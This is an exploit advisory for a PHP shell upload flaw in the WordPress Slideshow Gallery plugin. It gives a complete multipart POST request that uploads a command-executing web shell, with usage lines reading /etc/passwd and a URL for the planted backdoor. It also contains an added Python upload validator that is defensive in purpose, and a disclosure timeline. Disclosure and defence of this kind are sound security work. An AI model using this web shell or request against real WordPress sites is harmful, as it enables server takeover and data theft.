######################
# Exploit Title : WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://tribulant.com
# Software Link : http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
# Date : 2014-08-09
# Tested on : Windows 7 / Mozilla Firefox
######################
# Description :
Any user with access to the slide editor (administrators by default) can upload PHP files through the slide save handler.
######################
# Location
http://127.0.0.1/wp-content/plugins/slideshow-gallery/views/admin/slides/save.php
######################
# PoC Exploit:
POST
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/admin.php?page=slideshow-slides&method=save&id=4
Cookie: wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407776360%7C538bd40b62d672bbc26a5b5d8a0cf9e5; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407776360%7Cac34ce538e8b9532559c6940a5d73c04; redux_current_tab=3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------31064175401770
Content-Length: 1839
POST body:
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[id]"

4
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[order]"

0
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[title]"

titolo_demo
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[description]"


-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[showinfo]"

both
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[iopacity]"

70
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[type]"

file
-----------------------------31064175401770
Content-Disposition: form-data; name="image_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
Usage: http://target.com/shell.php?cmd=cat+/etc/passwd
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[image_oldfile]"

2136.png
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[image_url]"


-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[uselink]"

N
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[link]"


-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[linktarget]"

self
-----------------------------31064175401770
Content-Disposition: form-data; name="submit"

Save Slide
-----------------------------31064175401770--
Backdoor location:
http://127.0.0.1/wp-content/uploads/slideshow-gallery/shell.php?cmd=pwd
PoC Video:
https://www.youtube.com/watch?v=9iuMsUFl9dM
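The following Python check is an added example, not code from this advisory or from the Slideshow Gallery plugin. It parses a multipart body of the same shape as the PoC request (the sample bodies are constructed; the field names, boundary and filenames are taken from the request above) and shows the validation the save handler lacks: the client-supplied filename is untrusted, so the extension is checked against an image allow-list, a script extension anywhere in the name is rejected, and the content's leading bytes must match the claimed image type. The parse_multipart, validate_image_upload, check_slide_request and build_body functions are this example's own names.

```python
import re

# Image types the slide upload should accept: extension -> leading magic bytes.
ALLOWED_IMAGE = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Extensions a typical PHP-enabled web server will execute.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into parts.

    Returns a list of dicts with name, filename, content_type and data.
    Minimal parser for this example; it assumes CRLF line endings.
    """
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):      # closing delimiter reached
            break
        chunk = chunk.lstrip(b"\r\n")
        if b"\r\n\r\n" in chunk:
            header_blob, data = chunk.split(b"\r\n\r\n", 1)
        else:
            header_blob, data = chunk, b""
        if data.endswith(b"\r\n"):       # CRLF that precedes the next delimiter
            data = data[:-2]
        headers = {}
        for line in header_blob.decode("latin-1").split("\r\n"):
            if ":" in line:
                key, value = line.split(":", 1)
                headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'(?<!file)name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        parts.append({
            "name": name.group(1) if name else None,
            "filename": fname.group(1) if fname else None,
            "content_type": headers.get("content-type"),
            "data": data,
        })
    return parts


def validate_image_upload(filename, data):
    """Decide whether an upload may be stored as a slide image.

    Returns (accepted, reason). The filename is client-controlled, so the
    extension alone proves nothing: the content's magic bytes must agree.
    """
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path part
    segments = base.lower().split(".")
    if len(segments) < 2 or not segments[-1]:
        return False, "missing extension"
    if any(seg in SCRIPT_EXTS for seg in segments[1:]):     # catches shell.php.png too
        return False, "script extension in filename"
    ext = segments[-1]
    if ext not in ALLOWED_IMAGE:
        return False, "extension ." + ext + " is not an image type"
    if not data.startswith(ALLOWED_IMAGE[ext]):
        return False, "content does not match ." + ext + " magic bytes"
    if b"<?php" in data:                 # heuristic against image/PHP polyglots
        return False, "PHP open tag inside image data"
    return True, "ok"


def check_slide_request(body, boundary):
    """Run the validation over a captured save request body."""
    parts = parse_multipart(body, boundary)
    for part in parts:
        if part["name"] == "image_file":
            accepted, reason = validate_image_upload(part["filename"] or "", part["data"])
            return {"filename": part["filename"], "accepted": accepted,
                    "reason": reason, "fields": len(parts)}
    return {"filename": None, "accepted": False,
            "reason": "no image_file part", "fields": len(parts)}


# Constructed sample bodies in the shape of the advisory's PoC request.
BOUNDARY = "---------------------------31064175401770"
SLIDE_FIELDS = {"Slide[id]": "4", "Slide[title]": "titolo_demo", "Slide[type]": "file"}


def build_body(fields, filename, file_data, boundary=BOUNDARY):
    """Assemble a multipart/form-data body (constructed test input)."""
    delim = ("--" + boundary).encode()
    out = b""
    for key, value in fields.items():
        out += (delim + b'\r\nContent-Disposition: form-data; name="' + key.encode()
                + b'"\r\n\r\n' + value.encode() + b"\r\n")
    out += (delim + b'\r\nContent-Disposition: form-data; name="image_file"; filename="'
            + filename.encode() + b'"\r\nContent-Type: application/octet-stream\r\n\r\n'
            + file_data + b"\r\n")
    return out + delim + b"--\r\n"


PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16          # constructed, not a real image
MALICIOUS_BODY = build_body(SLIDE_FIELDS, "shell.php", b"<?php echo 'not an image'; ?>")
DOUBLE_EXT_BODY = build_body(SLIDE_FIELDS, "photo.php.png", PNG_STUB)
POLYGLOT_BODY = build_body(SLIDE_FIELDS, "photo.png", PNG_STUB + b"<?php echo 1; ?>")
BENIGN_BODY = build_body(SLIDE_FIELDS, "2136.png", PNG_STUB)

if __name__ == "__main__":
    for label, body in [("malicious", MALICIOUS_BODY), ("double-ext", DOUBLE_EXT_BODY),
                        ("polyglot", POLYGLOT_BODY), ("benign", BENIGN_BODY)]:
        print(label, check_slide_request(body, BOUNDARY))
```

Run it directly to see each sample body's verdict. Validation in the handler is one layer; the request above also shows why a second one matters: the file landed under wp-content/uploads/slideshow-gallery/ and was executed from there, so a web server rule that refuses to run PHP from the uploads tree would have turned the same upload into an inert file.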
######################
# Vulnerability Disclosure Timeline:
2014-08-09: Discovered vulnerability (version 1.4.5)
2014-08-09: Vendor Notification (Twitter)
2014-08-14: Plugin version 1.4.6 released without a fix
2014-08-14: Vendor Notification (Support web page)
2014-08-15: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch (1.4.7)
2014-09-01: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################